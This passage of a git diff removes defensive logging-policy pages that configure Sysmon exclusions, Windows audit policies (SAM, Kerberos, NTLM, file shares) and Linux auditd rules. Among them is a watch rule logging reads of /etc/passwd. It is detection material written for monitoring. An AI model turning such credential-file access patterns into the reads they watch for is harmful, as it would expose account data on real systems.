-    <Image condition="is">C:\Windows\system32\smss.exe</Image> <!-- Microsoft:Windows: Session Manager SubSystem: Creates swapfile.sys,pagefile.sys,hiberfile.sys-->
-    <Image condition="is">C:\Windows\system32\CompatTelRunner.exe</Image> <!-- Microsoft:Windows: Windows 10 app, creates tons of cache files-->
-    <Image condition="is">\\?\C:\Windows\system32\wbem\WMIADAP.EXE</Image> <!-- Microsoft:Windows: WMI Performance updates-->
-    <Image condition="is">C:\Windows\system32\mobsync.exe</Image> <!--Microsoft:Windows: Network file syncing-->
-    <TargetFilename condition="begin with">C:\Windows\system32\DriverStore\Temp\</TargetFilename> <!-- Microsoft:Windows: Temp files by DrvInst.exe-->
-    <TargetFilename condition="begin with">C:\Windows\system32\wbem\Performance\</TargetFilename> <!-- Microsoft:Windows: Created in wbem by WMIADAP.exe-->
-    <TargetFilename condition="end with">WRITABLE.TST</TargetFilename> <!-- Microsoft:Windows: Created in wbem by svchost-->
-    <TargetFilename condition="begin with">C:\Windows\Installer\</TargetFilename> <!--Microsoft:Windows:Installer: Ignore MSI installer files caching-->
-    <!--SECTION: Microsoft:Windows:Updates-->
-    <TargetFilename condition="begin with">C:\$WINDOWS.~BT\Sources\</TargetFilename> <!-- Microsoft:Windows: Feature updates containing lots of .exe and .sys-->
-    <Image condition="begin with">C:\Windows\winsxs\amd64_microsoft-windows</Image> <!-- Microsoft:Windows: Windows update-->
-    <!--SECTION: Dell-->
-    <Image condition="is">C:\Program Files (x86)\Dell\CommandUpdate\InvColPC.exe</Image>
-    <!--SECTION: Intel-->
-    <Image condition="is">C:\Windows\system32\igfxCUIService.exe</Image> <!--Intel: Drops bat and other files in \Windows in normal operation-->
-    <!--SECTION: Adobe-->
-    <TargetFilename condition="is">C:\Windows\System32\Tasks\Adobe Acrobat Update Task</TargetFilename>
-    <TargetFilename condition="is">C:\Windows\System32\Tasks\Adobe Flash Player Updater</TargetFilename>
-  </FileCreate>
-```
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0009_windows_sysmon_PipeEvent.md b/Atomic_Threat_Coverage/Logging_Policies/LP0009_windows_sysmon_PipeEvent.md
deleted file mode 100644
index 0047111..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0009_windows_sysmon_PipeEvent.md
+++ /dev/null
@@ -1,21 +0,0 @@
-| Title            | LP0009_windows_sysmon_PipeEvent                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Enables logging of events related to usage or creation of pipes.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>17</li><li>18</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)</li></ul> |
-
-
-
-## Configuration
-
-This configuration should be further tunned according to baseline
-
-Sample configuration:
-```
-  <PipeEvent onmatch="exclude">
-  </PipeEvent>
-```
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0010_windows_sysmon_WmiEvent.md b/Atomic_Threat_Coverage/Logging_Policies/LP0010_windows_sysmon_WmiEvent.md
deleted file mode 100644
index 6eb41a5..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0010_windows_sysmon_WmiEvent.md
+++ /dev/null
@@ -1,24 +0,0 @@
-| Title            | LP0010_windows_sysmon_WmiEvent                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Enables logging of events related to usage of windows management interface. Possible events are:
-  - WmiEventFilter activity detected
-  - WmiEventConsumer activity detected
-  - WmiEventConsumerToFilter activity detected                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>19</li><li>20</li><li>21</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon)</li></ul> |
-
-
-
-## Configuration
-
-This configuration should be further tunned according to baseline
-
-Sample configuration:
-```
-  <WmiEvent onmatch="exclude">
-  </WmiEvent>
-```
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0011_windows_sysmon_DnsQuery.md b/Atomic_Threat_Coverage/Logging_Policies/LP0011_windows_sysmon_DnsQuery.md
deleted file mode 100644
index f5c435e..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0011_windows_sysmon_DnsQuery.md
+++ /dev/null
@@ -1,22 +0,0 @@
-| Title            | LP0011_windows_sysmon_DnsQuery                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Enables logging of events related to DNS queries and responses                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>22</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-22-dnsevent-dns-query](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-22-dnsevent-dns-query)</li></ul> |
-
-
-
-## Configuration
-
-This configuration should be further tuned according to baseline (filtration required).
-
-Sample configuration:
-```
-<DnsQuery onmatch="exclude">
-</DnsQuery>
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0025_windows_audit_directory_service_changes.md b/Atomic_Threat_Coverage/Logging_Policies/LP0025_windows_audit_directory_service_changes.md
deleted file mode 100644
index 4090687..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0025_windows_audit_directory_service_changes.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0025_audit_directory_service_changes                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Directory Service Changes determines whether  the operating system generates audit events when changes  are made to objects in Active Directory Domain Services (AD DS)                                                               |
-| **Default**      | Partially (Other)                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>5136</li><li>5137</li><li>5138</li><li>5139</li><li>5141</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-directory-service-changes.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-directory-service-changes.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-DS Access > 
-Audit Directory Service Changes (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0026_windows_audit_user_account_management.md b/Atomic_Threat_Coverage/Logging_Policies/LP0026_windows_audit_user_account_management.md
deleted file mode 100644
index 311595a..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0026_windows_audit_user_account_management.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0026_windows_audit_user_account_management                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit User Account Management determines whether the operating  system generates audit events when specific user account  management tasks are performed                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>4720</li><li>4722</li><li>4723</li><li>4724</li><li>4725</li><li>4726</li><li>4738</li><li>4740</li><li>4765</li><li>4766</li><li>4767</li><li>4780</li><li>4781</li><li>4794</li><li>4798</li><li>5376</li><li>5377</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-user-account-management.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-user-account-management.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-Account Management > 
-Audit User Account Management (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0027_windows_audit_directory_service_access.md b/Atomic_Threat_Coverage/Logging_Policies/LP0027_windows_audit_directory_service_access.md
deleted file mode 100644
index 06a9ee1..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0027_windows_audit_directory_service_access.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0027_windows_audit_directory_service_access                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Directory Service Access determines whether the operating  system generates audit events when an Active Directory Domain  Services (AD DS) object is accessed                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4662</li><li>4661</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-directory-service-access.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-directory-service-access.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-DS Access > 
-Audit Directory Service Access (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0028_windows_audit_sam.md b/Atomic_Threat_Coverage/Logging_Policies/LP0028_windows_audit_sam.md
deleted file mode 100644
index 001d8de..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0028_windows_audit_sam.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0028_windows_audit_sam                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit SAM, which enables you to audit events that are  generated by attempts to access Security Account Manager  (SAM) objects.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4661</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-sam.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-sam.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-Object Access > 
-Audit SAM (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0029_windows_audit_detailed_file_share.md b/Atomic_Threat_Coverage/Logging_Policies/LP0029_windows_audit_detailed_file_share.md
deleted file mode 100644
index 5c44939..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0029_windows_audit_detailed_file_share.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0029_windows_audit_detailed_file_share                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Detailed File Share allows you to audit attempts to  access files and folders on a shared folder.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>5145</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-detailed-file-share.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-detailed-file-share.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-Object Access > 
-Audit Detailed File Share (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0030_windows_audit_file_share.md b/Atomic_Threat_Coverage/Logging_Policies/LP0030_windows_audit_file_share.md
deleted file mode 100644
index d0c5827..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0030_windows_audit_file_share.md
+++ /dev/null
@@ -1,26 +0,0 @@
-| Title            | LP0030_windows_audit_file_share                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit File Share allows you to audit events related to file  shares: creation, deletion, modification, and access attempts.  Also, it shows failed SMB SPN checks.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>5140</li><li>5142</li><li>5143</li><li>5144</li><li>5168</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-file-share.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/95b9d7c01805839c067e352d1d16702604b15f11/windows/security/threat-protection/auditing/audit-file-share.md)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Advanced Audit Configuration:
-```
-Computer Configuration > 
-Policies > 
-Windows Settings > 
-Security Settings > 
-Advanced Audit Policies Configuration > 
-Audit Policies > 
-Object Access > 
-Audit File Share (Success,Failure)
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0031_linux_auditd_execve.md b/Atomic_Threat_Coverage/Logging_Policies/LP0031_linux_auditd_execve.md
deleted file mode 100644
index ffc5d79..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0031_linux_auditd_execve.md
+++ /dev/null
@@ -1,38 +0,0 @@
-| Title            | LP0031_linux_auditd_execve                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Policy to enable auditd to log process (binary) execution (execeve syscall)  with command line arguments                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul></ul>         |
-| **References**   | <ul><li>[https://github.com/linux-audit/audit-documentation](https://github.com/linux-audit/audit-documentation)</li><li>[https://github.com/Neo23x0/auditd](https://github.com/Neo23x0/auditd)</li></ul> |
-
-
-
-## Configuration
-
-Command to log the execve system call:
-
-```
-auditctl -a exit,always -S execve
-```
-
-Command to enable logging of specific executable invocation:
-
-```
-auditctl -a exit,always -S execve -F path=/usr/bin/rrdtool
-```
-
-To permanently implement auditd rules, edit `/etc/audit/rules.d/audit.rules` file:
-
-```
--a exit,always -S execve                           # log everything
-```
-
-Command to enable rules (execute as root):
-
-```
-augenrules --load
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0032_linux_auditd_read_access_to_file.md b/Atomic_Threat_Coverage/Logging_Policies/LP0032_linux_auditd_read_access_to_file.md
deleted file mode 100644
index b51a300..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0032_linux_auditd_read_access_to_file.md
+++ /dev/null
@@ -1,32 +0,0 @@
-| Title            | LP0032_linux_auditd_read_access_to_file                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Policy to enable auditd to log read access to file                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul></ul>         |
-| **References**   | <ul><li>[https://github.com/linux-audit/audit-documentation](https://github.com/linux-audit/audit-documentation)</li><li>[https://github.com/Neo23x0/auditd](https://github.com/Neo23x0/auditd)</li></ul> |
-
-
-
-## Configuration
-
-Command to log read access to `/etc/passwd`:
-
-```
-auditctl -w /etc/passwd -p r
-```
-
-To permanently implement auditd rules, edit `/etc/audit/rules.d/audit.rules` file:
-
-```
--w /etc/passwd -p r
-```
-
-Command to enable rules (execute as root):
-
-```
-augenrules --load
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0033_linux_auditd_syscall.md b/Atomic_Threat_Coverage/Logging_Policies/LP0033_linux_auditd_syscall.md
deleted file mode 100644
index 775dfc2..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0033_linux_auditd_syscall.md
+++ /dev/null
@@ -1,35 +0,0 @@
-| Title            | LP0033_linux_auditd_syscall                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Policy to enable auditd to log of specific system call (syscall)                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul></ul>         |
-| **References**   | <ul><li>[https://github.com/linux-audit/audit-documentation](https://github.com/linux-audit/audit-documentation)</li><li>[https://filippo.io/linux-syscall-table/](https://filippo.io/linux-syscall-table/)</li><li>[https://access.redhat.com/solutions/36278](https://access.redhat.com/solutions/36278)</li><li>[https://github.com/Neo23x0/auditd](https://github.com/Neo23x0/auditd)</li></ul> |
-
-
-
-## Configuration
-
-Command to log kill syscall for x64 CPU architecture:
-
-```
-auditctl -a exit,always -F arch=b64 -S kill
-```
-
-You can configure variety of [syscalls](https://filippo.io/linux-syscall-table/).
-If the system is 32 bit OS, you need to set it with "arch=b32".
-
-To permanently implement auditd rules, edit `/etc/audit/rules.d/audit.rules` file:
-
-```
--a exit,always -F arch=b64 -S kill -k kill_signal
-```
-
-Command to enable rules (execute as root):
-
-```
-augenrules --load
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0034_linux_named_client_security_log.md b/Atomic_Threat_Coverage/Logging_Policies/LP0034_linux_named_client_security_log.md
deleted file mode 100644
index d18a4cd..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0034_linux_named_client_security_log.md
+++ /dev/null
@@ -1,35 +0,0 @@
-| Title            | LP0034_linux_named_client_security_log                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Policy to enable BIND (named) DNS server client_security log                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul></ul>         |
-| **References**   | <ul><li>[https://kb.isc.org/docs/aa-01526](https://kb.isc.org/docs/aa-01526)</li></ul> |
-
-
-
-## Configuration
-
-Edit `/etc/bind/named.conf` file, adding the next configuration:
-
-```
-logging {
-      channel client_security_log {
-              file "/var/named/log/client_security" versions 3 size 20m;
-              print-time yes;
-              print-category yes;
-              print-severity yes;
-              severity info;
-      };
-      category security { client_security_log; };
-      category client{ client_security_log; };
-```
-
-Restart service to implementation configuration:
-
-```
-systemctl restart bind9.service
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0037_windows_audit_audit_policy_change.md b/Atomic_Threat_Coverage/Logging_Policies/LP0037_windows_audit_audit_policy_change.md
deleted file mode 100644
index 03805ab..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0037_windows_audit_audit_policy_change.md
+++ /dev/null
@@ -1,32 +0,0 @@
-| Title            | LP0037_windows_audit_audit_policy_change                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | This policy determines whether the operating system generates  audit events when changes are made to audit policy                                                               |
-| **Default**      | Partially (Success)                                                                   |
-| **Event Volume** | Low                                                                    |
-| **EventID**      | <ul><li>4902</li><li>4907</li><li>4904</li><li>4905</li><li>4715</li><li>4719</li><li>4817</li><li>4902</li><li>4906</li><li>4907</li><li>4908</li><li>4912</li><li>4904</li><li>4905</li></ul>         |
-| **References**   | <ul><li>[https://technet.microsoft.com/en-us/library/dn319116(v=ws.11).aspx](https://technet.microsoft.com/en-us/library/dn319116(v=ws.11).aspx)</li><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-audit-policy-change.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-audit-policy-change.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-Policy Change >
-Audit Audit Policy Change (Success,Failure)
-```
-
-Script to implement logging policy:
-
-```
-auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
-```
-
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0038_windows_audit_kerberos_authentication_service.md b/Atomic_Threat_Coverage/Logging_Policies/LP0038_windows_audit_kerberos_authentication_service.md
deleted file mode 100644
index fa9abd6..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0038_windows_audit_kerberos_authentication_service.md
+++ /dev/null
@@ -1,31 +0,0 @@
-| Title            | LP0038_windows_audit_kerberos_authentication_service                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | Audit Kerberos Authentication Service determines whether to generate  audit events for Kerberos authentication ticket-granting ticket (TGT) requests                                                               |
-| **Default**      | Partially (Other)                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4768</li><li>4771</li><li>4772</li></ul>         |
-| **References**   | <ul><li>[https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter4#KAS](https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter4#KAS)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-authentication-service](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-authentication-service)</li><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-kerberos-authentication-service.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-kerberos-authentication-service.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-Account Logon >
-Audit Kerberos Authentication Service (Success,Failure)
-```
-
-Script to implement logging policy:
-
-```
-Auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
-```
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0039_windows_audit_kernel_object.md b/Atomic_Threat_Coverage/Logging_Policies/LP0039_windows_audit_kernel_object.md
deleted file mode 100644
index 6a15b09..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0039_windows_audit_kernel_object.md
+++ /dev/null
@@ -1,31 +0,0 @@
-| Title            | LP0039_windows_audit_kernel_object                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | This policy setting allows you to audit attempts to access the kernel,  which include mutexes and semaphores. Only kernel objects with a matching  system access control list (SACL) generate security audit events                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4656</li><li>4658</li><li>4660</li><li>4663</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-kernel-object.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-kernel-object.md)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kernel-object](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kernel-object)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter7](https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter7)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Security Audit Policy Settings >
-Audit Policies >
-Object Access >
-Audit Kernel Object (Success)
-```
-
-Script to implement logging policy:
-
-```
-Auditpol /set /subcategory:"Kernel Object" /success:enable /failure:disable
-```
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0041_windows_audit_other_object_access_events.md b/Atomic_Threat_Coverage/Logging_Policies/LP0041_windows_audit_other_object_access_events.md
deleted file mode 100644
index a887e95..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0041_windows_audit_other_object_access_events.md
+++ /dev/null
@@ -1,31 +0,0 @@
-| Title            | LP0041_windows_audit_other_object_access_events                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | This security policy setting determines whether the operating system generates  audit events for the management of Task Scheduler jobs or COM+ objects                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | Medium                                                                    |
-| **EventID**      | <ul><li>4671</li><li>4691</li><li>5148</li><li>5149</li><li>4698</li><li>4699</li><li>4700</li><li>4701</li><li>4702</li><li>5888</li><li>5889</li><li>5890</li></ul>         |
-| **References**   | <ul><li>[https://technet.microsoft.com/en-us/library/dd772744(v=ws.10).aspx](https://technet.microsoft.com/en-us/library/dd772744(v=ws.10).aspx)</li><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-other-object-access-events.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-other-object-access-events.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Audit Policy Configuration >
-Audit Policies >
-Object Access >
-Audit Other Object Access Events (Success)
-```
-
-Script to implement logging policy:
-
-```
-Auditpol /set /subcategory:"Other Object Access Events" /success:enable /failure:disable
-```
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0042_windows_audit_handle_manipulation.md b/Atomic_Threat_Coverage/Logging_Policies/LP0042_windows_audit_handle_manipulation.md
deleted file mode 100644
index 20407cd..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0042_windows_audit_handle_manipulation.md
+++ /dev/null
@@ -1,31 +0,0 @@
-| Title            | LP0042_windows_audit_handle_manipulation                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | This security policy setting determines whether the operating system  generates audit events when a handle to an object is opened or closed.  Policy to enable smb share access logon events logging                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>4658</li><li>4690</li></ul>         |
-| **References**   | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-handle-manipulation.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/audit-handle-manipulation.md)</li></ul> |
-
-
-
-## Configuration
-
-Manual steps to implement logging policy:
-
-```
-Computer Configuration >
-Windows Settings >
-Security Settings >
-Advanced Audit Policy Configuration >
-Audit Policies >
-Object Access >
-Audit Handle Manipulation (Success,Failure)
-```
-
-Script to implement logging policy:
-
-```
-Auditpol /set /subcategory:"Handle Manipulation" /success:enable /failure:enable
-```
-
diff --git a/Atomic_Threat_Coverage/Logging_Policies/LP0044_windows_ntlm_audit.md b/Atomic_Threat_Coverage/Logging_Policies/LP0044_windows_ntlm_audit.md
deleted file mode 100644
index 8ec5ede..0000000
--- a/Atomic_Threat_Coverage/Logging_Policies/LP0044_windows_ntlm_audit.md
+++ /dev/null
@@ -1,28 +0,0 @@
-| Title            | LP0044_windows_ntlm_audit                                                                     |
-|:-----------------|:--------------------------------------------------------------------------------|
-| **Author**       | @atc_project                                                                      |
-| **Description**  | This is combined audit policy, consist of 3 policies under "Network security:  Restrict NTLM" — Audit NTLM authentication in this domain, Audit Incoming NTLM Traffic,  Outgoing NTLM traffic to remote servers. It will provide visibility on  NTLM authentication attempts. This policy is only about auditing events, it will not disable NTLM authentication itself.                                                               |
-| **Default**      | Not configured                                                                   |
-| **Event Volume** | High                                                                    |
-| **EventID**      | <ul><li>8001</li><li>8002</li><li>8003</li><li>8004</li></ul>         |
-| **References**   | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-audit-ntlm-authentication-in-this-domain](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-audit-ntlm-authentication-in-this-domain)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-audit-incoming-ntlm-traffic](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-audit-incoming-ntlm-traffic)</li><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers)</li></ul> |
-
-
-
-## Configuration
-
-Steps to implement logging policy with Group Policies:
-```
-Computer Configuratoin ->
-Policies ->
-Windows Settings ->
-Security Settings ->
-Local Policies ->
-Security Options:
-
-- Network security: Restrict NTLM: Audit NTLM authentication in this domain: Enable all
